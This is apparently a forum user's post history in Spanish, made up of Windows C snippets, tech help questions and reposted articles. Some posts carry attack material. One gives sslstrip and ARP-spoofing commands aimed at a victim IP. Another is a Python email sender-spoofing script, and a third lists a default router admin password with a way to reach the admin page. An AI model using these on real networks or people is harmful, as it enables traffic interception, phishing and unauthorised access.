   HBITMAP feisimo = NULL;
   DWORD dwThreadId;
   LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
   {
      switch (message)                  /* handle the messages */
      {
          case WM_CREATE:
              {
              HANDLE hThread = CreateThread (NULL,0,sonar,NULL,0,&dwThreadId);
              feisimo=LoadBitmap(GetModuleHandle(NULL), MAKEINTRESOURCE(IDB_BALL));
              if(feisimo == NULL)
              {
               MessageBox(hwnd, "no cargo feisimo :'( llora", "Error", MB_OK | MB_ICONEXCLAMATION);
              }
              }
              break;
          case WM_PAINT:
              {
                  BITMAP bm;
                  PAINTSTRUCT ps;
                  HDC hdc= BeginPaint(hwnd,&ps);
                  HDC hdcMem= CreateCompatibleDC(hdc);
                  HBITMAP hbmOld=(HBITMAP)SelectObject(hdcMem,feisimo);
                  GetObject(feisimo,sizeof(bm),&bm);
                  BitBlt(hdc,350,0,bm.bmWidth,bm.bmHeight,hdcMem,0,0,SRCCOPY);
                  SelectObject(hdcMem,hbmOld);
                  DeleteDC(hdcMem);
                  EndPaint(hwnd,&ps);
              }
              break;
          case WM_DESTROY:
              PostQuitMessage (0);       /* send a WM_QUIT to the message queue */
              break;
          default:                      /* for messages that we don't deal with */
              return DefWindowProc (hwnd, message, wParam, lParam);
      }

      return 0;
   }


#67
el windows esta completamente estropeado sale el escritorio pero no puedo acceder a nada todo dice "access denied" y es cuenta administrador  ni tampoco puedo ejecutar casi nada no puedo acceder a el panel donde esta "configuracion".

no puedo entrar a modo seguro de windows porque eso tambien se hace desde configuracion accediendo primero de forma normal a windows(eso parece estar diseñado por un simio si no puedo entrar de forma normal no puedo usar el modo seguro tampoco)

no puedo formatear porque para entrar a la "bios" /uefi  necesito hacerlo desde windows tambien.

:-\ que hago?

gracias de antemano
#68
Foro Libre / cuantos acá son colombianos
19 Octubre 2013, 16:40 PM
eso solo tenia curiosidad me siento algo solito :P
#69
lo que se encuentra mientras uso el pc para hacer "tareas"
[youtube=640,360]https://www.youtube.com/watch?v=Xyp7xt-ygy0#t=93[/youtube]
#70
configurar router ubee

Parece que se me está volviendo costumbre enfrentarme a routers colocados por los ISP's que tienen los cifrados web por default, o sea el típico cifrado WEP. Bueno hace rato estaba tratando de entrar a la configuración de uno de ellos y no podía, así que como siempre utilizé a nuestro amigo google y después de mucho leer encontré la solución que les coloco a continuación.


Vamos a navegar por un tor browser, el cual nos crea un anonimato en internet para navegar.

1. Bajen el programa de Tor Browser, lo descomprimen y ejecutan el Star Tor Browser.

2. Dejen que conecte a la red y abrirá el navegador que tienen por default. Les dirá que su IP es XX.XX.XX.XX


3. En un navegador diferente al que les abrió el Tor Browser, averiguen su IP real en www.cualesmiip.com 

nota:esto no es necesario dependiendo de la version de tor browser del 6 al 8 primero intenten saltar el paso si no funciona haganlo
4. En el navegador Tor, abran otra pestaña y coloquen about:config

5. Den clic en el botón que les aparece y les aparecerá una lista completa de redes.
6. Clic derecho - Nuevo - Cadena
7. En el cuadro que les aparece escriban network.security.ports.banned.override y enter

8. En el siguiente cuadro que les preguntan el valor escriban: 64680 y enter

9. Ahora con la IP real, en el navegador Tor escriban: http://ipreal:64680

10. Den clic en Login y les pedirá el usuario y contraseña

user: admin
pass: Uq-4GIt3M

Listo! ya tienen acceso al router Ubee para poder configurarlo a su gusto

Actualización: Para que los cambios surtan efecto, hay que reiniciar el router.
No pensé que era necesario ya que con un router RCA anteriormente configurado no tuve que hacerlo. Pero después de que me percaté que nadie navegaba en la red e incluso configurando la conexión inalámbrica en Windows, no tenían salida a Internet... se me dio por reiniciar el Ubee y todo quedó listo.
fuente: http://datalibre.blogspot.com/2013/04/configurar-router-ubee-dvw-2110.html
#71
Foro Libre / hungria - dictadura fascista-2013
13 Octubre 2013, 03:04 AM
hasta ahora me entero y hay titulares como
CitarEl antisemitismo atenaza a Hungría
CitarHungría castiga a los sin techo con multas, trabajo comunitario y cárcel
http://internacional.elpais.com/internacional/2013/10/01/actualidad/1380654889_241578.html

que opinan?
conocian algo al respecto?

Citar
Hungría, la amenaza europea


Benjamin Abtan, El País, 1 de mayo, 2013

Ya es un hecho: Hungría ha dejado de ser una democracia.

El presidente János Áder acaba de firmar los decretos de aplicación de las nuevas reformas constitucionales que borran del mapa los restos de oposición antigubernamental. Más concretamente, el Tribunal Constitucional ya no puede dar su opinión sobre el contenido de las leyes ni remitirse a su propia jurisprudencia, lo cual conduce a la pérdida de prácticamente cualquier capacidad de control sobre el Parlamento y el Ejecutivo.

Esta concienzuda destrucción de la democracia y sus valores, cuyo punto de partida fue el maremoto electoral causado por Fidesz en 2010, está en marcha desde hace muchos meses y a la vista de todos.

El ataque ha sido claro y continuado: la perniciosa restricción de la libertad de prensa; la tutela política del Banco Central; la incorporación a la Constitución de alusiones al cristianismo y a la "utilidad social" de los individuos, vista como condición necesaria para acceder a derechos sociales; la eliminación de la palabra "República" de la propia definición que del sistema político hace la carta magna; la condena de la homosexualidad, la criminalización de los sin techo; el ataque a los derechos de la mujer; la impunidad otorgada a los autores de asesinatos racistas; la agudización de un virulento antisemitismo, y así sucesivamente.

Hace pocos días, Orban otorgó condecoraciones oficiales a tres destacadas figuras de la extrema derecha: el periodista Ferenc Szaniszlo, conocido por sus diatribas contra judíos y romaníes, que él compara con "monos"; el arqueólogo antisemita Kornel Bakav, que atribuye a los judíos la organización de la trata de esclavos en la Edad Media y, finalmente, el "artista" Petras Janos, orgulloso de proclamar su simpatía por Jobbik y su milicia paramilitar, responsable de varios asesinatos racistas de gitanos y heredero del Partido de la Cruz Flechada, artífice del exterminio de judíos y gitanos durante la Segunda Guerra Mundial.

Esta degradación política nos proporciona una truculenta lección histórica y política. Durante el siglo XX, la democracia representativa sufrió el embate de los dos principales regímenes totalitarios de la centuria: el nazismo y el comunismo. Hoy en día, en el siglo XXI, la democracia ha caído, en pleno corazón de Europa, ante las arremetidas de un populismo antieuropeo, nacionalista, racista y antisemita, y en medio de la indiferencia de la Unión Europea y de demasiados de sus ciudadanos y líderes.

Obsesionada con problemas económicos y financieros, demasiado indiferente a sus propios valores fundamentales —libertad, igualdad, paz y justicia— la UE ha abandonado la lucha por el fomento e incluso el mantenimiento de la democracia como sistema político de sus Estados miembros.

Al contrario que, por ejemplo, la Rusia de Putin, Hungría carece de resortes de poder, así que no podemos invocar la realpolitik para justificar este abandono. En vista de que Hungría depende enormemente de las subvenciones y la ayuda de Europa y de que la UE ha demostrado inquietantemente en Grecia hasta qué punto su apoyo financiero puede alcanzar un grado de politización extrema, tampoco podemos aducir una supuesta falta de margen de maniobra.

Por desgracia, la razón principal de este abandono por parte de Europa es tan simple como preocupante: la falta de compromiso de los ciudadanos y líderes europeos con el mantenimiento de la democracia representativa como sistema político.

Esta es la razón de que, desde su reelección en 2010, Orban haya recibido el inquebrantable apoyo de muchos dirigentes europeos, sobre todo de su propia familia política: esto explica también que la Comisión Europea no utilice ninguno de los instrumentos de que dispone, aunque tiene muchos, para imponer el respeto a los valores fundamentales de la UE.

Por ejemplo, la Comisión, el Parlamento y el Consejo europeos, donde los Estados están representados, pueden actuar de manera concertada para llevar a cabo acciones en consonancia con el Artículo 7 del Tratado de la UE, introducido en 1997 en Ámsterdam para evitar cualquier paso atrás en materia democrática en cualquiera de los Estados miembros. El objetivo del Artículo 7 es suspender el derecho a voto en el Consejo de un país en el que exista una "posible violación de valores comunes".

Sin embargo, en Hungría hace tiempo que se superó la fase de riesgo. En consecuencia, para comenzar a mostrar un fuerte compromiso de la UE con la defensa de la democracia y sus valores, habría que tomar medidas urgentes para aplicar el Artículo 7. Igualmente, la sociedad civil europea debe seguir manteniendo un compromiso firme con los demócratas húngaros, que valientemente luchan dentro de su propio país.

Si el compromiso de la UE y la sociedad civil no mostraran la decisión que exige la gravedad de la situación, estaríamos condenados a asistir a un rápido deterioro de la misma, en Hungría y pronto en otros lugares, si el compromiso europeo resultara insuficiente.

No nos equivoquemos: lo que está en juego es la naturaleza del proyecto europeo y la capacidad de Europa para preservar nuestro bien más preciado: la democracia. Durante varias décadas no había sido tan evidente la alternativa entre barbarie y democracia. Sin dudarlo, debemos elegir Europa y la democracia.

Benjamin Abtan, presidente de European Grassroots Antiracist Movement (EGAM)

Traducción de Jesús Cuéllar Menezo


http://blogeuropeo.eu/2013/05/02/hungria-ya-no-es-una-democracia/
http://eurasianhub.com/2013/05/15/hungria-la-amenaza-europea/


#72
cuando tengo varios threats como logro que se ejecute cada uno en una ventana diferente cmd o bue si no puedo intentare en interfaz grafica(api windows)
gracias :)
#73
hoy me levante con ganas de programar algo y bueno salio esto:
en caso de querer usar la hora usa los minutos y los segundos para generar el numero

el algoritmo es el de los cuadrados medios un poco modificado por los errores que poseia este en su momento

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <windows.h>

int aleatorio(int semilla);

int main()
{
int semilla=0; //si el valor de semilla es cero usara la hora para obtener numeros aleatorios
while(1==1)
  {
  semilla=aleatorio(semilla);
  printf("aleatorio %i\n",semilla);
  Sleep(1000);
  }
}

int aleatorio(int semilla)
{
int ContarDigitos,contador,multiplicar;
if(semilla==0)
{
  time_t FapTime;
  struct tm * ptm;
  time(&FapTime);
  ptm=gmtime ( &FapTime );
  semilla=(ptm->tm_min-5)*100+(ptm->tm_sec);
}
semilla+=1111;
semilla=semilla*semilla;
contador=0;
ContarDigitos=semilla;
while(ContarDigitos>0)
{
ContarDigitos=(int)ContarDigitos/10;
contador++;
}
if(contador<8)
{

    for(multiplicar=contador;multiplicar<8;multiplicar++)
    {
        semilla=semilla*10;
    }
}
semilla=(semilla/100)%10000;
return semilla;
}

#74
Citar¿ Destruir Internet ? no es ciencia ficción esto ya paso y podría volver a pasar.

Ok hoy quiero compartirles una entrada que me pareció muy interesante y que me gustaría que leyeran hasta el final...


El mundo ha estado a punto de que el internet sea destruido al menos 4 veces 1 de ellas de hecho aniquilo la red por un momento.

En 1997 un ruteador que fue configurado erróneamente, se convirtió ruteador central de internet, algo similar a un ataque " hombre en el medio por ARP Poison" todo el trafico de internet intento pasar por ese único ruteador. El resultado fue desastroso el internet colapsó, seguramente muchos no lo recuerdan porque eran pequeños y aunque importante en 1997 el Internet no era tan masivo, sin facebook, netflix y otras cosas de consumo inmediato como ahora hizo que esta falla pasara desapercibida, lo mas masivo en ese entonces fue el correo electrónico que llegaron retrasados debido a que no podían ser entregados por los MTA Servers. Sin embargo este aunque fue un fallo de aniquilación y colapso total pudo ser revertido porque al final fue error humano y no había ninguna intención de destruir el internet.

Las otras 3 veces han estado a punto de lograr el colapso lo preocupante es que aquí si había la intención de terminar con el internet.

Ha pasado mucho tiempo y tal vez no recuerdo bien al autor del ataque, creo que fue atribuido a  Anonymous, los mismos que atacaron a la iglesia de la cientologia.

Lo que sucedió fue que hace 11 años en el mes de octubre del 2002 un sorpresivo ataque que no fue avisado ni anticipado fue dirigido a los 13 servidores raíz de DNS del mundo. Esto no ha cambiado mucho al 2013. Son muy pocos los servidores que sostienen el internet literalmente, en el 2002 eran solo 13, si algo le pasa a esos 13 servicios el internet seria paralizado indefinidamente por la falta de reconversión de dominios a direcciones ip. No todo el internet colapsaría porque aun se podría usar la conexión directa de ip a ip sin usar dominio, sin embargo el 99.99% de las conexiones a internet se hacen usando un dominio. Por lo que solo quedaría funcionando el 0.01% de la red que en realidad es NADA.

Los servidores raíz son los que almacenan una lista de los registrar de primer nivel, los dominios de primer nivel son los .COM .NET .ORG .EDU .GOV .MX .VE .AR .ES en resumen los que almacenan la terminación de los dominios según su país. Por ejemplo la parte de primer nivel de la cueva es .NET en su versión colombiana es .CO


¿Cómo funciono el ataque?

Históricamente el dominio de primer nivel se le asigna a la institución de un país que se haya conectado por primera vez a internet. En México la primera fue el Tec de Monterrey. El Tec por lo tanto tuvo el derecho de registrar el dominio .MX de primer nivel. Así que en los servidores raíz se programo para apuntar el .MX hacia el Tec. De Monterrey.

Los servidores de DNS del TEC se configuraron para dar soporte a los dominios de segundo nivel, los de segundo nivel en la mayoría de los piases son una clonación de los de primer nivel. Por ejemplo el .COM en México es .COM.MX por lo tanto los servidores del TEC fueron programados para atender .COM.MX, .NET.MX, .EDU.MX, .GOB.MX. Finalmente los usuarios pueden comprar un dominio de tercer nivel por ejemplo newstechnology.com.mx y yo con mi dominio puedo lanzar sub dominios de cuarto nivel, quinto y todos los niveles que yo desee.

Nivelx.delnively.delnivelz.newstechnology.com.mx

Los servidores DNS son jerárquicos solo resuelven la parte que le corresponde y dejan el siguiente nivel para que sea resuelto por el servidor designado en el caso de México a Akky antes NIC de México.

Sabiendo esto podemos deducir lo siguiente. Si alguien quiere ir a la página de www.newstechnology.com.mx  uno de los servidores raíz resolverá que .MX es manejado por Akky y reenviara la petición a Akky, Akky a su vez internamente lo reenviara a sus servidores que manejan el .com.mx. Este servidor que maneja el .com.mx lo reenviara finalmente a mi servidor que controla el newstechnology.com.mx  y si tengo subniveles debajo de eso podría resolver www.newstechnology.com.mx  o mas subniveles.

Si quisiera acabar con todos los dominios .com.mx de mexico tendría que atacar a akky y dejaría fuera a todo .com.mx. Pero si quisiera terminar con toda la resolución de dominios en el mundo sin importar el país. Atacaría los servidores raíz. Si no se pueden resolver los dominios de primer nivel por ejemplo .com o .mx de nada serviría que haya comprado mi dominio en akky no podría ser resulto y ya que los servidores raíz atienden todos los dominios de primer nivel hacerlos caer haría caer la resolución de dominios del mundo y por lo tanto la falla total de internet.

En el 2002 trabajaba como administrador de la red corporativa de Demar instaladora y contractura S.A. de C.V. Fue un verdadero fastidio y dolor de cabeza todo empezó a fallar, no llegaban los correos, los correos enviados tampoco llegaban a su destino. Las páginas web no abrían, había que intentar muchas veces y la mayoría de las veces las paginas abrían solo porque estaban en memoria cache de el servidor DNS de la compañía no porque realmente se haya resuelto, lo recuerdo bien por que como responsable de la red todo el mundo te pregunta, ¿ya quedo? Cada 5 minutos. Fue un momento horrible para mí y para todo administrador de red que haya estado laborando en ese puesto aquel octubre del 2002.

En el tercer intento, hay un héroe. GNU/Linux salva al internet y a la misma Microsoft

La tercera vez fue un año después, otro ataque DDoS esta vez no fueron hacia los servidores raíz del internet. En Agosto del 2003 un virus/gusano Blaster ataco directamente a Microsoft por medio de maquinas zombies infectadas, el gusano atacaba una vulnerabilidad en todo los Windows XP y NT, Windows 2000 Server e incluso el recién salido Windows 2003 eran vulnerables, como era una falla en el código fuente del sistema operativo Blaster podía infectar usando la vulnerabilidad. En aquella ocasión hice varias pruebas.

Instale Windows XP lo puse de frente a Internet y se infecto 23 minutos después
Instale un Windows 2000 y se infecto 16 minutos después
Instale un Windows 2003 y se infecto 26 minutos después.

Todos o casi todos los servidores basados en Windows debieron estar infectados sin contar las maquinas XP.


La solución era obvia había que parchar la vulnerabilidad. Pero el programador de blaster previo esto, una vez infectado suficientes maquinas todas al mismo tiempo atacaron el sitio de Windows. Windowsupdate.microsoft.com , el parche fue sacado de inmediato y se crearon los services pack.

En XP fue el Service pack 4, no recuerdo para Windows 2000 pero para el Windows 2003 recién salido al mercado tuvo su primer service pack 1 casi de inmediato. El problema es que al no poder acceder a Windowsupdate.microsoft.com por estar bajo ataque, ninguna maquina se pudo parchar y descargar el Service Pack de cada versión del sistema operativo.

Sin la posibilidad de parche la infección se incremento y más y más zombies se unieron a atacar windowsupte.microsoft.com. Con más del 90% de las maquinas operadas con Windows en el 2003 una infección de este tamaño puso al mundo en manos de los creadores de Blaster, ahora solo tenían que programar un modulo para hacer lo que quisieran, borrar todos los discos duros, atacar servidores raíz, tenían el poder de terminar con el internet con unas cuentas líneas de código.

En el momento más sombrío Microsoft tomo la decisión correcta. Su inútil sistema operativo era incapaz de soportar el ataque DDoS en Windowsupdate.microsoft.com, contrato más servidores pero no les instalo Windows. Parte de tomar la decisión correcta fue que estos servidores los que salvarían a Microsoft de perder el total control de las maquinas con Windows, la decisión sería instalarlas con GNU/Linux. Con un sistema operativo capaz de soportar la tortura de Blaster cayéndose y levantándose poco a poco se fueron parchando las maquinas con Windows.

En el 2003 Micosoft tuvo que aceptar la humillación de que su sistema operativo Windows 2003 y anteriores no podían soportar las cargas de internet mucho menos un ataque directo DDoS y se demostró el gran poder de Linux para manejar millones de peticiones, entregando los services pack a las maquinas infectadas. Al final Linux salvo el dia.


La infección fue tan grande que en el 2005 instale un Windows 2003 y lo puse de cara a internet sin protección ni service pack, 2 horas después se había infectado de blaster, en el 2005 todavía quedaban miles de maquinas infectadas con blaster. Tal vez aun hoy 10 años después quedan maquinas con blaster habría que probar.

El último intento ocurrió poco antes de escribir este artículo, pero comparado a las veces anteriores incluso el cuarto intento se oye ridículo no debería contar de hecho creo que es amarillismo puro.

Según el universal esta semana de Marzo del 2013 se ha llevado a cabo el ataque más grande a Internet http://www.eluniversal.com.mx/sociedad/7827.html , porque CloudFare no pudo evitar protegerse a sí mismo de un ataque que pudo alcanzar los 300Gbps. Yo no considero un momento crítico el ataque, solo el fracaso de una empresa que presume ser inmune a los DDoS.

Espero sea de gusto el post agradecerle a LastDragon por compartirnos esta información Saludos!

http://news-technology-learning.blogspot.com/2013/04/destruir-internet-no-es-ciencia-ficcion.html
#75
pues a la vista de tantos post  tipo " como hackear facebook" propongo que apenas se registre se le envie un mensaje ,post , pagina o  lo que sea que explique lo basico y se le encamine a las diferentes F.A.Q dependiendo de lo que busque. explicando que no debe preguntar y que si etc (que tampoco sea tan largo).

incluso que el mismo mensaje traiga un pequeño codigo dentro del texto y la unica forma de postear sea leerlo para encontrarlo.

no se que opinen.

#76
Redes / no me funciona sslstrip
25 Agosto 2013, 19:48 PM
pues eso estoy usando linux kali es una red wireles y ejecuto
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -l 10000
arpspoof -i wlan0 -t 192.168.0.16 192.168.0.1

no sale ningun error ni nada
cuando dejo el echo en 0 se queda sin internet asi que el arp spoof funciona
se que no funciona porque en el otro computador no cambian los https por http

:-\
gracias de antemano  :)
#77
5.
Steins;Gate
toma lugar en el verano del 2010, a un años después aproximadamente de los eventos ocurridos en ChäoS;HEAd en Akihabara: Rintaro Okabe es un auto-proclamado "Científico Loco" que piensa que la "Organización" está controlando el mundo desde las sombras. Él y junto a su amigo Itaru Hashida inconscientemente construyen un aparato capaz de enviar mensajes de texto al pasado. El descubrimiento y a su vez la experimentación junto a Kurisu Makise con aquellos mensajes en el tiempo, producen cambios fundamentales en el presente, que nadie más que Okabe nota. Después comprueban la existencia de dicha habilidad, la cual denomina Reading Steiner, la capacidad de retener los recuerdos de anteriores líneas de tiempo. Sin conocer lo que acarrearían sus acciones, continúan experimentando, hasta llegar a un punto, en que el caos domina la linea existente, y tratarán todo lo posible para encontrar una solución a los problemas anteriormente creados, pero con el miedo, de que quizás, la solución sea peor que el problema en si mismo.
http://www.mcanime.net/descargadirecta/anime/steinsgate/11677

4.
serial experiments lain.
El primer estremecimiento en la solitaria vida de Lain Iwakura ocurre cuando se entera de que los estudiantes de su escuela han recibido extraños correos electrónicos póstumos de Chisa Yomoda, una compañera de clase que se suicidó. Lain recibe un mensaje en su casa, en el que Chisa le dice que no se trata de una broma y que se encuentra con Dios. A partir de entonces, Lain inicia un camino que la llevará a adentrarse cada vez más en la red -o Wired, similar al internet actual- y en sus propios pensamientos. Después de ello, trata de descubrir más acerca del tema, pidiéndole a su padre un nuevo Navi y así intentar comunicarse nuevamente con Chisa.
https://es.wikipedia.org/wiki/Serial_Experiments_Lain

3.
ergo proxy
La historia comienza en una ciudad llamada Romdo en la cual habitan humanos y unos robots denominados “Autoraves”, pero luego ocurren una serie de asesinatos causados por Autoraves infectados con un virus denominado “Cogito”, el cual dota de emociones a los robots. “Vincent” un inmigrante encargado de eliminar autoraves infectados se ve involucrado con uno llamado “PINO” la cual es acusada de causar la infección en la ciudad.
http://animeflv.net/anime/ergo-proxy.html

2.
psycho pass
En un futuro próximo, es posible medir de forma instantánea el estado mental de una persona, la personalidad y la probabilidad de que dicha persona vaya a cometer delitos con un dispositivo instalado en el cuerpo llamado Psycho-Pass. Cuando esta probabilidad, medida como el índice de "Coeficiente de Criminalidad", es demasiado alta los individuos son perseguidos y detenidos con fuerza letal, si es necesario. Esta tarea es realizada por un equipo especial de potenciales delincuentes llamados Ejecutores, que son supervisados ​​por oficiales de la policía conocidos como Inspectores. Los inspectores deben asegurarse de que los ejecutores en ejercicio cumplan con sus funciones dentro de los límites de la ley. Los ejecutores e inspectores emplean armas especiales llamadas "dominadores" diseñadas para disparar sólo contra aquellos con un coeficiente de criminalidad mayor de lo normal. La historia sigue a una Unidad de la División de la Oficina de Seguridad Pública e Investigación Criminal, el equivalente a la policía del tiempo actual, directamente responsable y administradora del trabajo de Inspectores y Ejecutores.6

1.
ghost in the shell stand alone complex
uede recordar a Blade Runner por su focalización en la entidad del cyborg; en el sentido de que además de las capacidades desarrolladas por sus implantes cibernéticos y cibercerebros, si estos - los ciborgs o ginoides - serían capaces de desarrollar recuerdos y emociones propias. Se trata, de manera implícita, de la existencia de un "ghost" - referido al espíritu humano - que habita en los cibercerebros avanzados y que puede ser transferido o implantado entre cuerpos cibernéticos, conservando la personalidad y los recuerdos de su original.

La serie también trata intensamente problemas complejos de política, relaciones entre las altas esferas y espionaje industrial, así como un profundo análisis - que se realiza durante las dos temporadas de la serie - mediante los paralelos futuristas que traza de nuestra sociedad actual, y las formas en que podrían derivar en el futuro. Sin una necesidad de exactitud en cómo podría derivar, la serie no intenta asentar las bases del futuro sino vislumbrar a través de la imaginación del director y del propio telespectador ese posible futuro que llevaría consigo la implantación de la tecnología de manera masiva en la humanidad.

Dentro de la serie hay también otra historia, la de los "Tachikomas", minitanques arácnidos de asalto concebidos como arma pero que, al tener una inteligencia totalmente artificial, tienen un comportamiento infantil y despreocupado. Aunque a lo largo de la serie y conforme se va desarrollando esa poca IA, van cuestionándose inquietudes sobre su propia existencia. Existe algunos capítulos aparte de la serie GITS SAC, sobre estos "Tachikomas" incluidos después de los créditos de la serie.
https://es.wikipedia.org/wiki/Ghost_in_the_Shell:_Stand_Alone_Complex
#78
Foro Libre / webchat - freenode anda caido
16 Julio 2013, 15:54 PM
eso desde hace varios dias no puedo entrar desde el webchat , soy solo yo?

jeje saludos
#79
nota: antes de poner estos temas temas suelo buscar muchas  fuentes asi que si alguien quiere pongo algunas mas (lastimosamente quienes suelen difundir este tema son los conspiranoicos quitandole seriedad y decorandolo con informacion que apoya sus absurdas ideas)  ;D
Citar
Proyecto MK ULTRA: Un escalofriante programa de modificación conductual realizado por la CIA
Conocer cómo responden las personas y poder anticipar sus reacciones es un camino largo, muchas veces tortuoso y que brinda escasa fiabilidad. No obstante, han sido muchos los psicólogos que se han obsesionado con la modificación y la pevisión comportamental. Uno de los experimentos psicológicos más tristes y menos conocidos es el Proyecto MK ULTRA, el código que se utilizó para cubrir un experimento ilegal desarrollado por la CIA.

El Proyecto MK ULTRA comenzó a principios de los años '50 y se extendió durante casi una década. Los sujetos de experimentación eran ciudadanos norteamericanos y canadienses. No obstante, vale aclarar que sus orígenes se remontan al 1945 cuando se estableció la Operación Paperclip, un programa dirigido a reclutar científicos nazis que posteriormente se dedicaron al estudio del lavado de cerebro y al perfeccionamiento de los mecanismos de tortura.

La evidencia que existe sobre este programa de investigación sugiere que se utilizaban las más disímiles metodologías para manipular los estados mentales y las funciones cerebrales, incluyendo la administración de drogas y otros químicos, la privación sensorial, el aislamiento y los abusos verbales y sexuales.

Este proyecto se hizo público en el año 1975, a través del Congreso Norteamericano y gracias a las investigaciones del Church Committee y la Rockefeller Commission. Por supuesto, como es de esperar, estas investigaciones se vieron obstaculizadas porque en el año 1973 Richard Helms (director de la CIA) ordenó destruir muchos de los documentos relacionados con el Proyecto MK ULTRA. Así, las investigaciones se basaron fundamentalmente en los testimonios de personas que sobrevivieron a los experimentos.

No obstante, recientemente alguna información relativa al proyecto MK ULTRA se ha desclasificado (aproximadamente 20.000 documentos), mostrándose que cerca de 30 universidades e instituciones (como empresas farmacéuticas y clínicas médicas) formaban parte de este programa, cuyos métodos solían incluir el uso de LSD sin el consentimiento de las personas ya que entre los objetivos perseguidos se encontraba el de crear una "droga de la verdad perfecta" que sería utilizada en los interrogatorios. Se estima que para este proyecto se destinaron más de 10 millones de dólares (que en aquel tiempo era una cantidad considerable).

Otros de los objetivos del Proyecto MK ULTRA eran:

-Hallar sustancias que propiciasen el pensamiento ilógico y la impulsividad.

-Hallar sustancias que incrementasen la eficiencia mental y la percepción.

-Hallar sustancias que produjesen amnesia y confusión mental.

-Hallar sustancias que alteraran la personalidad haciendo a la persona particularmente sugestionable.

No obstante, más allá de la experimentación con drogas, también se coqueteó con la hipnosis. En este casos e intentaba promover a través de la hipnosis estados ansiosos, aumentar la capacidad de aprendizaje y de memorización, promover la amnesia anterógrada y retrógrada así como producir cambios en la personalidad.

Lo más triste es que este proyecto y todos sus subprogramas (149 en total) estuvieron asistidos por psicólogos que brindaban su ayuda a partir de la realización de entrevistas, la aplicación de test para evaluar los procesos psíquicos, la realización de análisis grafológicos o incluso diseñando algunos experimentos.

De hecho, uno de los experimentos más inquietantes fue el desarrollado por el psiquiatra canadiense Ewen Cameron. En la década de los años '50 Cameron desarrolló un método para el tratamiento de los pacientes psicóticos basado en lo que el llamó "conducción psíquica". Después de presentar un protocolo de estudio en el año 1957 ante la Sociedad para la Investigación de Ecología Humana, la CIA decidió respaldar sus investigaciones sobre el comportamiento.

El procedimiento en cuestión consistía en romper los patrones de conducta actuales del paciente por medio de una terapia electroconvulsiva particularmente intensa (Depatterning); y en algunas ocasiones con dosis repetidas de LSD. Vale puntualizar que en estas sesiones de terapia electroconvulsiva se llegó a usar un voltaje 30 o 40 veces mayor al que era permitido con fines terapéuticos.

Este procedimiento se continuaba con una intensa repetición (16 horas diarias durante un periodo de seis o siete días) de mensajes grabados en cintas (en ciertos casos se llegaba a transmitir el mismo mensaje más de 250 000 veces) y en algunas ocasiones el paciente también era mantenido en una situación de aislamiento sensorial parcial.

Todo este proceso tenía el objetivo de "corregir la locura" eliminando los recuerdos existentes. El problema de este protocolo, además de sus evidentes procedimientos inhumanos, es que usualmente se utilizaba en personas que poseían problemas tan comunes como la ansiedad o la depresión post-parto.

La relación entre este procedimiento y el lavado de cerebro, evidentemente fue obvia para la CIA, razón por la cual se le proporcionó a Cameron la suma de $60 000 dólares de financiamiento.

De hecho, nueve de los antiguos pacientes de Cameron entablaron una demanda contra la CIA en el año 1979. Uno de los casos más fuertes fue el de Rita Zimmerman, quien fue sometida a 30 terapias electroconvulsivas seguidas por 56 días de sueño inducido por barbitúricos y otras drogas. Durante el tiempo que se mantuvo en coma barbitúrico, esta paciente fue sometida a la repetición constante de grabaciones con declaraciones diversas. Después de la experiencia, Zimmerman quedó incontinente y sufrió de graves episodios de amnesia. No obstante, todos los pacientes no fueron tan "afortunados" ya que muchos sufrieron daño cerebral permanente.

Como dato final, curiosa ironía de la vida, Cameron fue el primer presidente de la Asociación Mundial de Psiquiatría pero también se desempeñó como presidente de nuestra querida APA del 1952 al 1953.
fuente: http://www.rinconpsicologia.com/2011/01/proyecto-mk-ultra-un-escalofriante.html
#80
bueno mi pregunta es cual es la diferencia entre el uso de malloc , free y demas funciones estandar a el uso de los heap y la api  en windows  :)
#81
la idea de mi cliente de correo es poder falsificar el correo del que se envia el mail (no es que quiera hacer nada ilegal  ;))
Código (python) [Seleccionar]
#!/usr/bin/python
import smtplib
import os
from email.mime.text import MIMEText
print "programa para enviar correo"
mensaje = MIMEText(raw_input("mensaje a enviar "))
mensaje["From"]=raw_input("de quien quieres que aparezca en el correo ")
mensaje["To"]=raw_input("a parte de quien el correo quiere q aparezca ")
server = raw_input("que servidor \n nota: hotmail es smtp.live.com: ")
print "conectando al servidor"
try:
   s = smtplib.SMTP(server)
   s.ehlo(server)
   s.starttls()
   correo = raw_input("escriba su correo ")
   clave = raw_input("escriba clave ")
   print "entrando a su correo"
   s.login( correo, clave)
   correo2 = raw_input("a que correo quieren enviar el mail? ")
   s.sendmail(correo, correo2, mensaje.as_string())
   s.close
   print "correo enviado presione enter para salir"
   raw_input()
except:
          print "error no se pudo enviar el correo presione enter"
          raw_input()
#82
Muy interesante artículo traducido de Zunguzungu y distribuido ayer 1 de diciembre por Wikileaks en el grupo que la organización maneja en Facebook. Se trata de un resumen de las ideas de Julian Assange sobre las verdaderas pretensiones de Wikileaks al filtrar documentos ante el secretismo de los gobiernos, aderezado con profundas perspicacias del redactor.



Deconstruyendo Wikileaks: ¿cuál es el verdadero objetivo de las filtraciones?
escrito por zunguzungu


original en
http://zunguzungu.wordpress.com/2010/11/29/julian-assange-and-the-computer-conspiracy-%E2%80%9Cto-destroy-this-invisible-government%E2%80%9D/

traducido por yemeth para Decondicionamiento.org

("Abrimos gobiernos")
Citar"Para cambiar radicalmente la conducta del régimen debemos pensar con claridad y valentía, puesto que si algo hemos aprendido, es que los regímenes no quieren ser cambiados. Nuestro pensamiento debe ir más allá que el de quienes que nos han precedido, descubriendo cambios tecnológicos que nos envalentonen mediante modos de actuar en que antes no pudieran haber sido utilizados. Primero, debemos entender qué aspecto de la conducta del gobierno o del neocorporativismo queremos cambiar o eliminar. En segundo lugar, debemos desarrollar una forma de pensar sobre esta conducta que tenga la suficiente fuerza como para llevarnos a través del lodazal del lenguaje políticamente distorsionado, hasta llegar a una posición de claridad. Por último, debemos utilizar este entendimiento para inspirar en nosotros y en otros un curso de acción efectiva y ennoblecedora".

Julian Assange, "Conspiraciones estatales y terroristas"

